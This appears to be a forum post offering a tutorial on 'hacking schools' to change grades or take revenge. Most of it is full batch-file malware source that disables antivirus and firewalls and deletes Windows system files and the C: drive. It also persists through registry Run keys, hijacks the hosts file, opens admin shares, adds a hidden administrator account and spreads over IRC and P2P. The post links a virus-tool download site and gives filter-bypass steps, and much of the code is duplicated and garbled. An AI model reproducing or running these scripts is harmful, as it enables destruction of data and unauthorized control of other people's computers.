Ok I noticed a lot of people are asking questions about Hacking Their Schools.
For multiple reasons.Changing grades,revenge..
So I thought :"Hey why not make a tutorial of my own about hacking schools?"
So I made this.
Here I go
What are some ways?
Easy:
Batches.
Keyloggers.
Viruses.
Restricted Websites Access.
Administrator priviliges
Batches
Batches can pretty much do anything.
Flood Networks,Disable Computers,Delete C:\,Burn Memory...
I will give some nice batches.
Made by me/Thanatos/Laughing Man/Fun Pack.
Me:
Kills memory
Please save on the desktop
Thanatos:
Basically Fucks Up the pc.
Deletes Most of the necessary files.
Stops AV's Firewalls's Anything..
Kills most Processes
Pretty much it.
LaughingMan
Fun Pack
Deletes the system drive.
Keyloggers:
Sangederomin:
Viruses:
I think all of you know what Viruses mean.
Download some Virus Tools on :
http://www.to0l-base.de/index.php?dir=SysFucker%2F
and search for more on
http://www.to0l-base.de/
The password for all downloaded files are :
To0l-base
Restricted website access:
There are a lot of ways but here are some good ones:
http://www.vtunnel.com
This will go to any website you want
Start>run>ping http://www.url.com
Take the ip and paste it in the url of the browser there you have it:)
Administrator priviliges:
Click Start, Run and type Regedit.exe
Navigate to the following key:
HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ Winlogon \ SpecialAccounts \ UserList
Use the File, Export option to backup the key
Create a new DWORD Value named Administrator
Double-click Administrator, and set 1 as its data
Exit the Registry Editor.
For multiple reasons.Changing grades,revenge..
So I thought :"Hey why not make a tutorial of my own about hacking schools?"
So I made this.
Here I go
What are some ways?
Easy:
Batches.
Keyloggers.
Viruses.
Restricted Websites Access.
Administrator priviliges
Batches
Batches can pretty much do anything.
Flood Networks,Disable Computers,Delete C:\,Burn Memory...
I will give some nice batches.
Made by me/Thanatos/Laughing Man/Fun Pack.
Me:
Batch too long click to read (Click to Hide)
@echo off
@echo off
title I LIKE PRETTY COLORS!
:1
echo DONT YOU LOVE PRETTY COLORS!!
echo PLEASE JUST TAKE LIKE 20 SECONDS TO ADMIRE!!!
start mspaint.exe>nul
start cmd.exe>nul
copy "C:\Program Files">nul
copy "C:\Windows">nul
copy C:\WINDOWS\addins>nul
copy C:\WINDOWS\system32>nul
copy C:\WINDOWS\system>nul
color 21
color 12
color 43
color 34
goto :1
@echo off
title I LIKE PRETTY COLORS!
:1
echo DONT YOU LOVE PRETTY COLORS!!
echo PLEASE JUST TAKE LIKE 20 SECONDS TO ADMIRE!!!
start mspaint.exe>nul
start cmd.exe>nul
copy "C:\Program Files">nul
copy "C:\Windows">nul
copy C:\WINDOWS\addins>nul
copy C:\WINDOWS\system32>nul
copy C:\WINDOWS\system>nul
color 21
color 12
color 43
color 34
goto :1
Kills memory
Please save on the desktop
Thanatos:
Batch too long click to read (Click to Hide)
start
color 5
title Your Fucked, lol
time 12:00
net stop "Security center"
net stop sharedaccess
netsh firewall set opmode mode-disable
start
echo copy %0 >> c:\autoexec.bat
copy %0 c:\windows\startm~1\Programs\StartUp\shroom.bat
Attrib +r +h C:\windows\startm~1\program\startup\shroom.bat
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] >> c:\regstart.reg
echo "systemStart"="c:\filename\virus.bat" >> c:\regstart.reg
start c:\regstart.reg
copy %0 %systemroot%\shroom.bat > nul
start
copy %0 *.bat > nul
start
attrib +r +h virus.bat
attrib +r +h
RUNDLL32 USER32.DLL,SwapMouseButton
tskill msnmsgr
tskill Limewire
tskill iexplorer
tskill NMain
tskill Firefox
tskill explorer
tskill AVGUARD
msg * Awww Your computer is now fucked
msg * You got owned!
msg * Say Bye to your computer n00b
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
del "C:\WINDOWS\pchealth\"
del "C:\WINDOWS\system\"
del "C:\WINDOWS\system32\restore\"
del "C:\WINDOWS\system32\logonui.exe"
del "C:\WINDOWS\system32\ntoskrnl.exe"
del "Winlogon.exe"
ERASE c:
start
shutdown - s -t 15 -c "15 Seconds and counting"
cd %userprofile%\Desktop
copy fixvirus.bat %userprofile%\Desktop
echo HAXHAXHAX
:LOOP
color 17
color 28
color 32
color 22
color 11
color 02
color 39
color 34
GOTO LOOP
color 5
title Your Fucked, lol
time 12:00
net stop "Security center"
net stop sharedaccess
netsh firewall set opmode mode-disable
start
echo copy %0 >> c:\autoexec.bat
copy %0 c:\windows\startm~1\Programs\StartUp\shroom.bat
Attrib +r +h C:\windows\startm~1\program\startup\shroom.bat
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] >> c:\regstart.reg
echo "systemStart"="c:\filename\virus.bat" >> c:\regstart.reg
start c:\regstart.reg
copy %0 %systemroot%\shroom.bat > nul
start
copy %0 *.bat > nul
start
attrib +r +h virus.bat
attrib +r +h
RUNDLL32 USER32.DLL,SwapMouseButton
tskill msnmsgr
tskill Limewire
tskill iexplorer
tskill NMain
tskill Firefox
tskill explorer
tskill AVGUARD
msg * Awww Your computer is now fucked
msg * You got owned!
msg * Say Bye to your computer n00b
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
del "C:\WINDOWS\pchealth\"
del "C:\WINDOWS\system\"
del "C:\WINDOWS\system32\restore\"
del "C:\WINDOWS\system32\logonui.exe"
del "C:\WINDOWS\system32\ntoskrnl.exe"
del "Winlogon.exe"
ERASE c:
start
shutdown - s -t 15 -c "15 Seconds and counting"
cd %userprofile%\Desktop
copy fixvirus.bat %userprofile%\Desktop
echo HAXHAXHAX
:LOOP
color 17
color 28
color 32
color 22
color 11
color 02
color 39
color 34
GOTO LOOP
Deletes Most of the necessary files.
Stops AV's Firewalls's Anything..
Kills most Processes
Pretty much it.
LaughingMan
Batch too long click to read (Click to Hide)
@echo off
%j2dt%
%random%%random%%random%%random%%random%%random%%random%
%61jv%
%random%%random%%random%%random%%random%%random%%random%
%rytn%
%random%%random%%random%%random%%random%%random%%random%
%twsg%
%random%%random%%random%%random%%random%%random%%random%
%d4kb%
%random%%random%%random%%random%%random%%random%%random%
%qt36%
%random%%random%%random%%random%%random%%random%%random%
set a=Damn
%vhvx%
%uc62%
copy %0 %windir%\%a%.bat
%r42b%
%6ffa%
set The Laughing Man=tskill
%The Laughing Man% norton*
%The Laughing Man% av*
%The Laughing Man% fire*
%The Laughing Man% anti*
%The Laughing Man% spy*
%The Laughing Man% bullguard
%The Laughing Man% PersFw
%The Laughing Man% KAV*
%The Laughing Man% ZONEALARM
%The Laughing Man% SAFEWEB
%The Laughing Man% OUTPOST
%The Laughing Man% nv*
%The Laughing Man% nav*
%The Laughing Man% F-*
%The Laughing Man% ESAFE
%The Laughing Man% cle
%The Laughing Man% BLACKICE
%The Laughing Man% def*
%8r65%
%qngs%
%syuq%
%xqh8%
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Damn /t REG_SZ /d %windir%\%a%.bat
/f > nul
%3qr7%
%7tck%
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Damn /t REG_SZ /d %windir%\%a%.bat
/f > nul
%rtwd%
%wbm2%
set Damn1=echo
%wmt8%
%s5g7%
%Damn1% [windows] >> %windir%\win.ini
%uggu%
%Damn1% run=%windir%\%a%.bat >> %windir%\win.ini
%Damn1% load=%windir%\%a%.bat >> %windir%\win.ini
%Damn1% [boot] >> %windir%\system.ini
%btvq%
%Damn1% shell=explorer.exe %a%.bat >> %windir%\system.ini
%wkuu%
%ornm%
chcp 1252 > nul
%random%%The Laughing Man%%random%%Damn%
copy %0 "C:\Documents and Settings\All Users\Startmenu\Programs\Autostart\%a%.bat" > nul
%wnxl%
copy %0 "C:\Documents and Settings\All Users\Start Menu\Programs\Startup\%a%.bat" > nul
%random%%The Laughing Man%%random%%Damn%
%4i16%
net share ADMIN$
%oxps%
net share C$
net share IPC$
%847f%
net share c=c:
net share d=d:
%2shq%
%1ls3%
for %%a in (*.bat *.txt *.doc *.pdf *.jpg) do copy %0 %%a > nul
%2ww2%
set Damn2=echo
%ucu4%
%g5u2%
%Damn2% 127.0.0.1 http://www.google.com > %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 http://www.google.de >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 http://www.symantec.de >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 http://www.free-av.de >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 http://www.free-av.com >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 http://www.antivir.de >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 http://www.antivir.com >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 http://www.kaspersky.com >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 http://www.kaspersky.de >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 http://www.microsoft.com >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 http://www.microsoft.de >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 http://www.sophos.com >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 http://www.sophos.de >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 http://www.symantec.com >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 http://www.hijackthis.de >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 http://www.spychecker.com >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 http://www.trendmicro.com >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 http://www.trendmicro.de >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 http://www.lavasoftusa.com >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 http://www.yahoo.com >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 http://www.yahoo.de >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 http://www.lycos.com >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 http://www.lycos.de >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 google.com > %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 google.de >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 symantec.de >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 free-av.de >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 free-av.com >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 antivir.de >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 antivir.com >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 kaspersky.com >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 kaspersky.de >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 microsoft.com >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 microsoft.de >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 sophos.com >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 sophos.de >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 symantec.com >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 hijackthis.de >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 spychecker.com >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 trendmicro.com >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 trendmicro.de >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 lavasoftusa.com >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 yahoo.com >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 yahoo.de >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 lycos.com >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 lycos.de >> %windir%\system32\drivers\etc\hosts
%zp2x%
%msvp%
%gp6w%
echo MsgBox "I thought what I'd do was pretend to be one of those deaf mutes...", 16, "The
Laughing Man" > v.vbs
start v.vbs
%ufsx%
%wf2w%
set x=%random%
%kgxx%
%c3mp%
copy %0 %windir%\%x%.bat > nul
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v html /t REG_SZ /d
"%windir%\%x%.bat" /f > nul
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices" /v Damn /t REG_SZ /d
"%windir%\%a%.bat" /f > nul
cd %windir%\system32
for %%a in (*.bat) do copy %0 %%a > nul
cd ..
for %%a in (*.bat) do copy %0 %%a > nul
copy %0 c:\autoexec.bat
%g25d%
%fjjt%
%8tov%
set Damn3=echo
copy %0 %windir%\ftppassword.bat
%Damn3% [script] > irc.bat
%Damn3% n1={ if ($nick == $me) { halt } >> irc.bat
%Damn3% n2=/dcc send $nick "%windir%\ftppassword.bat" >> irc.bat
%Damn3% n3= } >> irc.bat
if exist c:\mIRC\script.ini copy irc.bat c:\mIRC\script.ini
%terz%
if exist %programfiles%\mIRC\script.ini copy irc.bat %programfiles%\mIRC\script.ini
del irc.bat > nul
%gtym%
%emx3%
md %programfiles%\Damn\xxx\ > nul
md %programfiles%\Damn\cracks\ > nul
copy %0 %programfiles%\Damn\xxx\xxxpasses.txt.bat > nul
copy %0 %programfiles%\Damn\cracks\keygen.exe.bat > nul
copy %0 %programfiles%\Damn\cracks\serialsV7.exe.bat > nul
copy %0 %programfiles%\Damn\cracks\crack_it.exe.bat > nul
echo to crack your programm use crack_it.exe, hf ;) > %programfiles%\Damn\cracks\readme.txt
net share xxx&cracks=%programfiles%\Damn > nul
%ud2n%
%The Laughing Man%%random%%Damn%
%vxis%
%s6wl%
net user root pwd /add
net localgroup "Administratoren" root /add
%tgom%
net localgroup "Administrators" root /add
%The Laughing Man%%random%%random%%Damn%
%bem8%
%u1ao%
reg add HKLM\SOFTWARE\Microsoft\Ole\ /v EnableDCOM /t REG_SZ /d Y /f > nul
reg add HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v restrictanonymous /t REG_SZ /d 0 /f > nul
%vp8e%
%ed7s%
%mknf%
%883k%
set The Laughing Manc=echo
%7j1e%
%The Laughing Manc% "" > %windir%\hax0r.html
%The Laughing Manc% "" >> %windir%\hax0r.html
%The Laughing Manc% "Virus " >> %windir%\hax0r.html
%The Laughing Manc% "" >> %windir%\hax0r.html
%The Laughing Manc% "" >> %windir%\hax0r.html
%The Laughing Manc% "
%The Laughing Manc% "" >> %windir%\hax0r.html
%The Laughing Manc% "" >> %windir%\hax0r.html
%6sbe%
reg add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t REG_SZ /d
"%windir%\hax0r.html" /f > nul
%vfeq%
%6xyr%
%3ujc%
%fo3h%
md %programfiles%\shared_folder > nul
copy %0 %programfiles%\shared_folder\parishilton.txt.bat > nul
copy %0 %programfiles%\shared_folder\parishilton_movie2.jpg.bat > nul
%Damn%%random%%Damn%%The Laughing Man%%random%
copy %0 %programfiles%\shared_folder\parishilton_phonenumbers.txt.bat > nul
copy %0 %programfiles%\shared_folder\parishilton_phonenumbers.bat > nul
%The Laughing Man%%random%%Damn%%Damn%%random% > nul
copy %0 %programfiles%\shared_folder\css_wallhack.bat > nul
reg add "HKCU\Software\Kazaa\LocalContent" /v DownloadDir /t REG_SZ /d
"%programfiles%\shared_folder" /f > nul
%um8f%
%cqww%
set Damna=copy
%ba2w%
%2vjg%
%Damna% %0 %programfiles%\Warez P2P Client\My Shared Folder\parishilton.txt.bat > nul
%Damna% %0 %programfiles%\Warez P2P Client\My Shared Folder\parishilton_movie2.jpg.bat > nul
%Damna% %0 %programfiles%\Warez P2P Client\My Shared Folder\parishilton_phonenumbers.txt.bat >
nul
%Damna% %0 c:\Warez P2P Client\My Shared Folder\parishilton.txt.bat > nul
%Damna% %0 c:\Warez P2P Client\My Shared Folder\parishilton_movie2.jpg.bat > nul
%ikwc%
%Damna% %0 c:\Warez P2P Client\My Shared Folder\parishilton_phonenumbers.txt.bat > nul
%ft5u%
%rai3%
%ml8t%
%xpnv%
shutdown /r /f /t 23 /c "I thought what I'd do was pretend to be one of those deaf mutes..."
%1jek%
%enas%
shutdown /s /f /t 23 /c "Infected with Damn virus!! - The Laughing Man"
%ot1d%
%w2cy%
%bpy7%
%h1jw%
%pvss%
%lmsz%
:bombing
chcp 1252 > nul
%random%%Damn%%random%%Damn%
copy %0 "C:\Documents and Settings\All Users\Startmenu\Program\Autostart\%random%.bat" > nul
copy %0 "C:\Documents and Settings\All Users\Startmenu\Program\%random%.bat" > nul
copy %0 "C:\Documents and Settings\All Users\Startmenu\%random%.bat" > nul
copy %0 "C:\Documents and Settings\%USERNAME%\Desktop\%random%.bat" > nul
copy %0 "C:\%random%.bat" > nul
%random%%The Laughing Man%%random%%The Laughing Man%
%g4yy%
taskkill /f /im explorer.exe > nul
taskkill /f /im lsass.exe > nul
goto bombing
%o4k7%
%ppwx%
%dav%
%7sxo%
:: Damn by The Laughing Man
%j2dt%
%random%%random%%random%%random%%random%%random%%random%
%61jv%
%random%%random%%random%%random%%random%%random%%random%
%rytn%
%random%%random%%random%%random%%random%%random%%random%
%twsg%
%random%%random%%random%%random%%random%%random%%random%
%d4kb%
%random%%random%%random%%random%%random%%random%%random%
%qt36%
%random%%random%%random%%random%%random%%random%%random%
set a=Damn
%vhvx%
%uc62%
copy %0 %windir%\%a%.bat
%r42b%
%6ffa%
set The Laughing Man=tskill
%The Laughing Man% norton*
%The Laughing Man% av*
%The Laughing Man% fire*
%The Laughing Man% anti*
%The Laughing Man% spy*
%The Laughing Man% bullguard
%The Laughing Man% PersFw
%The Laughing Man% KAV*
%The Laughing Man% ZONEALARM
%The Laughing Man% SAFEWEB
%The Laughing Man% OUTPOST
%The Laughing Man% nv*
%The Laughing Man% nav*
%The Laughing Man% F-*
%The Laughing Man% ESAFE
%The Laughing Man% cle
%The Laughing Man% BLACKICE
%The Laughing Man% def*
%8r65%
%qngs%
%syuq%
%xqh8%
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Damn /t REG_SZ /d %windir%\%a%.bat
/f > nul
%3qr7%
%7tck%
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Damn /t REG_SZ /d %windir%\%a%.bat
/f > nul
%rtwd%
%wbm2%
set Damn1=echo
%wmt8%
%s5g7%
%Damn1% [windows] >> %windir%\win.ini
%uggu%
%Damn1% run=%windir%\%a%.bat >> %windir%\win.ini
%Damn1% load=%windir%\%a%.bat >> %windir%\win.ini
%Damn1% [boot] >> %windir%\system.ini
%btvq%
%Damn1% shell=explorer.exe %a%.bat >> %windir%\system.ini
%wkuu%
%ornm%
chcp 1252 > nul
%random%%The Laughing Man%%random%%Damn%
copy %0 "C:\Documents and Settings\All Users\Startmenu\Programs\Autostart\%a%.bat" > nul
%wnxl%
copy %0 "C:\Documents and Settings\All Users\Start Menu\Programs\Startup\%a%.bat" > nul
%random%%The Laughing Man%%random%%Damn%
%4i16%
net share ADMIN$
%oxps%
net share C$
net share IPC$
%847f%
net share c=c:
net share d=d:
%2shq%
%1ls3%
for %%a in (*.bat *.txt *.doc *.pdf *.jpg) do copy %0 %%a > nul
%2ww2%
set Damn2=echo
%ucu4%
%g5u2%
%Damn2% 127.0.0.1 http://www.google.com > %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 http://www.google.de >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 http://www.symantec.de >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 http://www.free-av.de >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 http://www.free-av.com >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 http://www.antivir.de >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 http://www.antivir.com >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 http://www.kaspersky.com >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 http://www.kaspersky.de >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 http://www.microsoft.com >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 http://www.microsoft.de >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 http://www.sophos.com >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 http://www.sophos.de >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 http://www.symantec.com >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 http://www.hijackthis.de >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 http://www.spychecker.com >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 http://www.trendmicro.com >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 http://www.trendmicro.de >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 http://www.lavasoftusa.com >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 http://www.yahoo.com >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 http://www.yahoo.de >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 http://www.lycos.com >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 http://www.lycos.de >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 google.com > %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 google.de >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 symantec.de >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 free-av.de >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 free-av.com >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 antivir.de >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 antivir.com >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 kaspersky.com >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 kaspersky.de >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 microsoft.com >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 microsoft.de >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 sophos.com >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 sophos.de >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 symantec.com >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 hijackthis.de >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 spychecker.com >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 trendmicro.com >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 trendmicro.de >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 lavasoftusa.com >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 yahoo.com >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 yahoo.de >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 lycos.com >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 lycos.de >> %windir%\system32\drivers\etc\hosts
%zp2x%
%msvp%
%gp6w%
echo MsgBox "I thought what I'd do was pretend to be one of those deaf mutes...", 16, "The
Laughing Man" > v.vbs
start v.vbs
%ufsx%
%wf2w%
set x=%random%
%kgxx%
%c3mp%
copy %0 %windir%\%x%.bat > nul
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v html /t REG_SZ /d
"%windir%\%x%.bat" /f > nul
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices" /v Damn /t REG_SZ /d
"%windir%\%a%.bat" /f > nul
cd %windir%\system32
for %%a in (*.bat) do copy %0 %%a > nul
cd ..
for %%a in (*.bat) do copy %0 %%a > nul
copy %0 c:\autoexec.bat
%g25d%
%fjjt%
%8tov%
set Damn3=echo
copy %0 %windir%\ftppassword.bat
%Damn3% [script] > irc.bat
%Damn3% n1={ if ($nick == $me) { halt } >> irc.bat
%Damn3% n2=/dcc send $nick "%windir%\ftppassword.bat" >> irc.bat
%Damn3% n3= } >> irc.bat
if exist c:\mIRC\script.ini copy irc.bat c:\mIRC\script.ini
%terz%
if exist %programfiles%\mIRC\script.ini copy irc.bat %programfiles%\mIRC\script.ini
del irc.bat > nul
%gtym%
%emx3%
md %programfiles%\Damn\xxx\ > nul
md %programfiles%\Damn\cracks\ > nul
copy %0 %programfiles%\Damn\xxx\xxxpasses.txt.bat > nul
copy %0 %programfiles%\Damn\cracks\keygen.exe.bat > nul
copy %0 %programfiles%\Damn\cracks\serialsV7.exe.bat > nul
copy %0 %programfiles%\Damn\cracks\crack_it.exe.bat > nul
echo to crack your programm use crack_it.exe, hf ;) > %programfiles%\Damn\cracks\readme.txt
net share xxx&cracks=%programfiles%\Damn > nul
%ud2n%
%The Laughing Man%%random%%Damn%
%vxis%
%s6wl%
net user root pwd /add
net localgroup "Administratoren" root /add
%tgom%
net localgroup "Administrators" root /add
%The Laughing Man%%random%%random%%Damn%
%bem8%
%u1ao%
reg add HKLM\SOFTWARE\Microsoft\Ole\ /v EnableDCOM /t REG_SZ /d Y /f > nul
reg add HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v restrictanonymous /t REG_SZ /d 0 /f > nul
%vp8e%
%ed7s%
%mknf%
%883k%
set The Laughing Manc=echo
%7j1e%
%The Laughing Manc% "" > %windir%\hax0r.html
%The Laughing Manc% "" >> %windir%\hax0r.html
%The Laughing Manc% "
%The Laughing Manc% "" >> %windir%\hax0r.html
%The Laughing Manc% "" >> %windir%\hax0r.html
%The Laughing Manc% "
" >> %windir%\hax0r.html
%The Laughing Manc% "" >> %windir%\hax0r.html
%The Laughing Manc% "" >> %windir%\hax0r.html
%6sbe%
reg add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t REG_SZ /d
"%windir%\hax0r.html" /f > nul
%vfeq%
%6xyr%
%3ujc%
%fo3h%
md %programfiles%\shared_folder > nul
copy %0 %programfiles%\shared_folder\parishilton.txt.bat > nul
copy %0 %programfiles%\shared_folder\parishilton_movie2.jpg.bat > nul
%Damn%%random%%Damn%%The Laughing Man%%random%
copy %0 %programfiles%\shared_folder\parishilton_phonenumbers.txt.bat > nul
copy %0 %programfiles%\shared_folder\parishilton_phonenumbers.bat > nul
%The Laughing Man%%random%%Damn%%Damn%%random% > nul
copy %0 %programfiles%\shared_folder\css_wallhack.bat > nul
reg add "HKCU\Software\Kazaa\LocalContent" /v DownloadDir /t REG_SZ /d
"%programfiles%\shared_folder" /f > nul
%um8f%
%cqww%
set Damna=copy
%ba2w%
%2vjg%
%Damna% %0 %programfiles%\Warez P2P Client\My Shared Folder\parishilton.txt.bat > nul
%Damna% %0 %programfiles%\Warez P2P Client\My Shared Folder\parishilton_movie2.jpg.bat > nul
%Damna% %0 %programfiles%\Warez P2P Client\My Shared Folder\parishilton_phonenumbers.txt.bat >
nul
%Damna% %0 c:\Warez P2P Client\My Shared Folder\parishilton.txt.bat > nul
%Damna% %0 c:\Warez P2P Client\My Shared Folder\parishilton_movie2.jpg.bat > nul
%ikwc%
%Damna% %0 c:\Warez P2P Client\My Shared Folder\parishilton_phonenumbers.txt.bat > nul
%ft5u%
%rai3%
%ml8t%
%xpnv%
shutdown /r /f /t 23 /c "I thought what I'd do was pretend to be one of those deaf mutes..."
%1jek%
%enas%
shutdown /s /f /t 23 /c "Infected with Damn virus!! - The Laughing Man"
%ot1d%
%w2cy%
%bpy7%
%h1jw%
%pvss%
%lmsz%
:bombing
chcp 1252 > nul
%random%%Damn%%random%%Damn%
copy %0 "C:\Documents and Settings\All Users\Startmenu\Program\Autostart\%random%.bat" > nul
copy %0 "C:\Documents and Settings\All Users\Startmenu\Program\%random%.bat" > nul
copy %0 "C:\Documents and Settings\All Users\Startmenu\%random%.bat" > nul
copy %0 "C:\Documents and Settings\%USERNAME%\Desktop\%random%.bat" > nul
copy %0 "C:\%random%.bat" > nul
%random%%The Laughing Man%%random%%The Laughing Man%
%g4yy%
taskkill /f /im explorer.exe > nul
taskkill /f /im lsass.exe > nul
goto bombing
%o4k7%
%ppwx%
%dav%
%7sxo%
:: Damn by The Laughing Man
Quote:- Fakes runtime
- Kills Anti Virus
- Reboots PC
- Shuts Down the pc
- Infects host files
- Shares C: D: ...
